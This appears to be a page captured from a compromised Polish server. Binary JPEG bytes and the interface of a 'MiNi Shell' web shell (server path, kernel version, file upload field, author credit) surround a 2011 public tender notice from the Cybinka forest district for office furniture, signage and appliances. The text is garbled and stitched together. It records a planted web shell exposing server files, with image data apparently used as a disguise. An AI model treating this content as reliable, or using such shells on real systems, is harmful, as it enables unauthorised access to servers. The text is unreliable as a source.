JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110520/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110520/122856-N-2011.html

<p class="kh_header"><b>Cybinka: Dostawa mebli i wyposażenia do biurowca Nadleśnictwa Cybinka
Przetarg nieograniczony</b><br>
<b>Numer ogłoszenia: 122856 - 2011; data zamieszczenia: 20.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Cybinka , ul. Dąbrowskiego 43, 69-108 Cybinka, woj. lubuskie, tel. 068 3911307, faks 068 3911152.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/editor-mode/pl/bip/dg/rdlp_zielona_gora/nadl_cybinka</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli i wyposażenia do biurowca Nadleśnictwa Cybinka
Przetarg nieograniczony.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa i montaż mebli  oraz zaprojektowanie, dostawa i montaż tablic informacyjnych, dekoracji i akcesoriów wystroju oraz dostawa sprzętu RTV i artykułów małego AGD, związanych z przebudową biurowca Nadleśnictwa Cybinka, położonego w Cybince przy ul. Dąbrowskiego 43 (gmina Cybinka, powiat słubicki, województwo lubuskie).
2. Dostawy i prace dekoracyjne realizowane będą w trakcie i po  zakończeniu robót budowlanych, umożliwiających bezpieczne, wygodne i estetyczne użytkowanie pomieszczeń tego budynku na cele biurowo-administracyjne oraz oznakowanie budynku i pomieszczeń biurowych zapewniające zgodne z aktualnymi przepisami wykonywanie statutowych funkcji przez inwestora.
3. Dostawę mebli i akcesoriów AGD należy wykonać w oparciu o dokumentację projektową  sporządzoną przez Biuro Dokumentacji Technicznej MDM mgr inż. Mirosława Daraszkiewicza z Zielonej Góry. Dokumentacja z 2007 roku została uzupełniona i aktualizowana na potrzeby niniejszego przetargu w maju 2011 roku. 
4.Integralną częścią tej dokumentacji jest /Projekt wyposażenia w meble i sprzęt AGD/ Projekt budowlany zatwierdzono Decyzją-pozwoleniem na budowę nr  5/2008 Starosty Słubickiego z dnia 04.01.2008 r.(znak spr.AB.7351-543/07).
5. Zaprojektowanie, dostawę i montaż akcesoriów i tablic informacyjnych oraz akcesoriów wystroju należy wykonać z uwzględnieniem wzorników zawartych w /Księdze Identyfikacji Wizualnej Państwowego Gospodarstwa Leśnego Lasy Państwowe/, stanowiących integralną część opracowania pt.: /Polityka Informacyjna Lasów Państwowych/ wprowadzonego do stosowania w jednostkach PGL LP Zarządzeniem Dyrektora Generalnego LP z dnia 28 stycznia 2010 roku. (znak GD-013/C/2/2010).
6. Zakres całego zamówienia ze względu na rodzaj materiału dostawy oraz wymagania stawiane wykonawcom podzielono na dwie odrębne części, objęte stawką podatku VAT 23%, w tym : 
a) Część 1 - dostawa i montaż mebli (biurek, stołów, stolików, szaf, szaf wnękowych, półek, dostawek, sofy, foteli, krzeseł konferencyjnych i obrotowych) oraz sprzętu AGD do gabinetów, biur i przebudowanych pomieszczeń gospodarczych w biurowcu w tym :
 b) Część 2 - zaprojektowanie, dostawa i montaż tablic informacyjnych, dekoracji i akcesoriów wystroju oraz dostawa sprzętu RTV i artykułów małego AGD, w tym: 
7. Szczegółowy opis wyposażenia meblowego znajduje się w dokumentacji projektowej pn.: /Projekt wyposażenia w meble i sprzęt AGD/, stanowiącej załącznik nr 1a do SIWZ, natomiast akcesoria wyposażenia wewnętrznego opisano w załączniku 1b do SIWZ.
8. W okresie realizacji dostaw i montażu mebli, sprzętu i akcesoriów  pracownicy Nadleśnictwa Cybinka będą przebywali i pracowali w  remontowanym budynku, dlatego dostawy winny być wykonane w terminach uzgodnionych z kierownikiem komórki administracyjno-gospodarczej, w sposób niekolidujący z pracą biura, oraz pracami budowlanymi.
9. Dostawy i montaż należy zaplanować i realizować w 2 etapach :
a)	I etap ( planowany termin to początek września 2011 roku): wyposażenie gabinetów i pomieszczeń biurowych na piętrze budynku, 
b)	II etap (planowany termin to początek listopada 2011 roku): wyposażenie biur na parterze budynku, montaż akcesoriów wyposażenia wewnętrznego biurowca.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające dotyczą powtórzenia tego samego rodzaju zamówień o wartości do 50% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 36.12.10.00-5, 36.11.22.00-1, 36.11.50.00-0, 36.12.00.00-8, 36.15.12.00-6, 36.67.00.00-8, 32.30.00.00-6, 30.19.00.00-7, 28.81.00.00-7, 74.14.21.20-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium  w  następującej  wysokości : 
a)	część 1 - 5 000,00 zł (słownie złotych : pięć tysięcy 00/100)
b)	część 2 - 900,00 zł (słownie złotych: dziewięćset 00/100)
Wadium może być wniesione w jednej lub kilku następujących formach:
1.pieniądzu,
2.poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie  kasy jest zawsze poręczeniem pieniężnym.
3.gwarancjach bankowych,
4.gwarancjach ubezpieczeniowych,
5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.Nr z 2007r. Nr 42, poz. 275, z 2008r. Nr 116 poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010r. Nr 96, poz. 620)..
Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: 
BGŻ O/Zielona Góra, konto nr 57 2030 0045 1110 0000 0050 4740
Wadium -Dostawa mebli i wyposażenia do biurowca Nadleśnictwa Cybinka - część ..  ( należy wpisać na którą z części zamówienia wpłacono wadium)
1. .Nie dopuszcza się wnoszenia wadium w formie pieniężnej do kasy Zamawiającego. 
2.Wadium wnoszone w formie niepieniężnej należy złożyć w formie oryginału w kasie Zamawiającego w pok. 
nr 21 w godz. pracy biura Nadleśnictwa ( od 8:00 do 14:00 ).
3.Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, na każde  pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.
4..Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert. tj. do dnia 07.06.2011 roku do godz. 945 .</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże że w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej jedno zamówienie o podobnym charakterze do przedmiotu zamówienia o wartości nie mniejszej niż :
a)	dla części 1 - 200000,00- zł brutto (słownie złotych: dwieście tysięcy): dostawy montaż mebli i sprzętu AGD
b)	dla części 2 - 20000,- zł brutto (słownie złotych: dwadzieścia tysięcy): dostawa i montaż wyposażenia biurowego lub projektowanie i wykonanie wystroju wewnętrznego w budynkach,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże że:
a)	posiada aktualne i odpowiedniej wysokości ubezpieczenie OC od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, które dla tego zamówienia ustalono na kwotę:
1)	dla części 1 -  minimum 100 000,00 zł (słownie złotych: sto tysięcy ) 
2)	dla części 2 -  minimum   20 000,00 zł (słownie złotych: dwadzieścia tysięcy)
b)	dysponuje środkami finansowymi lub zdolnością kredytową w wysokości:
1)	dla części 1 - minimum 100 000,00 zł (słownie złotych: sto tysięcy)
2)	dla części 1 - minimum   20 000,00 zł (słownie złotych: dwadzieścia tysięcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy o dysponowaniu potencjałem osobowym i technicznym (maszynami i urządzeniami) niezbędnym do realizacji zamówienia 
2. Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy każda ze stron może żądać wprowadzenia zmian w umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeśli wystąpi co najmniej jedna z niżej wymienionych okoliczności:
1.	W trakcie realizacji zamówienia zostanie ujawniony błąd Zamawiającego (np. w szczegółowym opisie przedmiotu zamówienia, niemożliwy do zauważenia przez Wykonawców w postępowaniu poprzedzającym wybór najkorzystniejszej oferty.
2.	Z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą (art. 3571 Kc).
3.	Nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego (np. ustawy, rozporządzenia, w tym zmiana stawki VAT) bądź przepisów wewnętrznych, obowiązujących w Państwowym Gospodarstwie Leśnym Lasy Państwowe (zarządzenia, decyzje i wytyczne Dyrektora Generalnego Lasów Państwowych).
4.	Wystąpi korzystna dla Zamawiającego redukcja przedmiotu zamówienia
5.	Wystąpi zmiana Wykonawcy w przypadkach sukcesji generalnej następującej w wyniku dozwolonego przekształcenia podmiotu bądź dziedziczenia oraz w przypadkach szczególnej sukcesji z mocy prawa (np. łączenie, dzielenie, przekształcenie spółek).
6.	Wystąpi konieczność: zmiany podwykonawcy, powierzenia wykonania części zakresu umowy podwykonawcy lub zmiany zakresu wykonania części zamówienia przez podwykonawcę.
7.	Wystąpi konieczność zmiany terminów umownych rozpoczęcia bądź zakończenia umowy z uwagi na: opóźnienie prac remontowych prowadzonych w budynku administracyjnym.
8.	W wyniku urzędowej zmiany stawki podatku VAT.  Należny podatek VAT naliczony zostanie do ceny netto w fakturze wg. stawki zgodnej z obowiązującym prawem w dniu wystawienia faktury, co nie dotyczy przypadków objęcia Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT, obowiązkiem podatkowym w zakresie tego podatku.
9.	Zaistnieją warunki ustalenia wcześniejszego terminu zakończenia, rozliczenia umowy i wystawienia faktury końcowej w przypadku wcześniejszego wykonania robót, usług dostaw objętych umową.
10.	W razie zaistnienia zdarzeń niezależnych od stron, po dacie zawarcia umowy, o charakterze działania siły wyższej, które uniemożliwiłyby terminowe wykonanie zobowiązań - strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu umowy.
11.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_zielona_gora/nadl_cybinka<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lasy Państwowe Nadleśnictwo 
ul. Dąbrowskiego 43
69-108 Cybinka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2011 godzina 09:45, miejsce: Lasy Państwowe Nadleśnictwo 
ul. Dąbrowskiego 43
69-108 Cybinka
pok. nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 06.07.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert odbędzie się w siedzibie Nadleśnictwa Cybinka, sala nr 3
dnia 07.06.2011r o godz. 10:00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa i montaż mebli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - dostawa i montaż mebli (biurek, stołów, stolików, szaf, szaf wnękowych, półek, dostawek, sofy, foteli, krzeseł konferencyjnych i obrotowych) oraz sprzętu AGD do gabinetów, biur i przebudowanych pomieszczeń gospodarczych w biurowcu w tym :
- wyposażenie w meble gabinetów nadleśniczego, zastępcy nadleśniczego,
- wyposażenie w meble sekretariatu i jego zaplecza socjalnego,
- wyposażenie zaplecza socjalnego przy sekretariacie w sprzęt AGD (zlewozmywak, 
  kuchenka mikrofalowa, lodówka, czajnik elektryczny),
- wyposażenie w meble 15 pomieszczeń biurowych oraz kasy i serwerowi,
- wyposażenie pomieszczeń w wieszaki do ubrań,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 36.12.10.00-5, 36.11.20.00-1, 36.11.50.00-0, 36.12.00.00-8, 36.11.40.00-8, 36.15.12.00-6, 36.67.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 - zaprojektowanie, dostawa i montaż tablic informacyjnych, dekoracji i akcesoriów wystroju oraz dostawa sprzętu RTV i artykułów małego AGD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - zaprojektowanie, dostawa i montaż tablic informacyjnych, dekoracji i akcesoriów wystroju oraz dostawa sprzętu RTV i artykułów małego AGD, w tym: 
- wykonanie nowego napisu Nadleśnictwo Cybinka i logo LP nad wejściem 
  głównym do budynku,
- wykonanie 6 ram prezentacyjnych do fotografii przyrodniczych na korytarzach,
- wykonanie 30 informacyjnych tabliczek przydrzwiowych,
- wykonanie 1 tablicy informacyjnej na parterze przy wejściu głównym,
- wykonanie 3 (2 dużych i 1 małej) tablic informacyjno-ogłoszeniowych,
- wykonanie metalowej czerwonej tablicy informacyjnej i godła przy wejściu głównym 
  na ścianie zewnętrznej budynku,
- wykonanie ozdobnych listew naściennych w Sali narad i na części korytarza (łączna 
  długość ścian montażowych 50 m)
- wykonanie 17 godeł RP oraz 40 ramek do zawieszenia wykazów wyposażenia 
  pomieszczeń biurowych,
- 60 donic kwiatowych różnych wielkości i 6 wielodonicowych obudów donic (do 
  ustawienia w korytarzach, holu wejściowym, sekretariacie i sali narad),
- 8 chodników, dywaników i dywanów różnej wielkości o łącznej powierzchni do 50 m2 - 24 kosze biurowe na odpady,
- 12 pojemników na odpady niesortowane do zamontowania w pomieszczeniach 
  socjalnych (aneks, kuchnia, łazienka i wc),
- 2 lustra łazienkowe o pow. do 0,8 m2 do pomieszczeń aneksu gościnnego,
- wymiana uchwytów w drzwiach wejściowych do budynku,
- wykonanie 2 ławeczek z drewna (do postawienia przy wejściu głównym do budynku),
- artykuły małego AGD: 4 wentylatory, 
- sprzęt RTV : 3 monitory telewizyjne LCD / HD różnej wielkości.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 36.14.00.00-8, 36.67.00.00-8, 36.15.12.00-6, 30.19.00.00-7, 28.88.12.00-7, 74.14.21.20-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com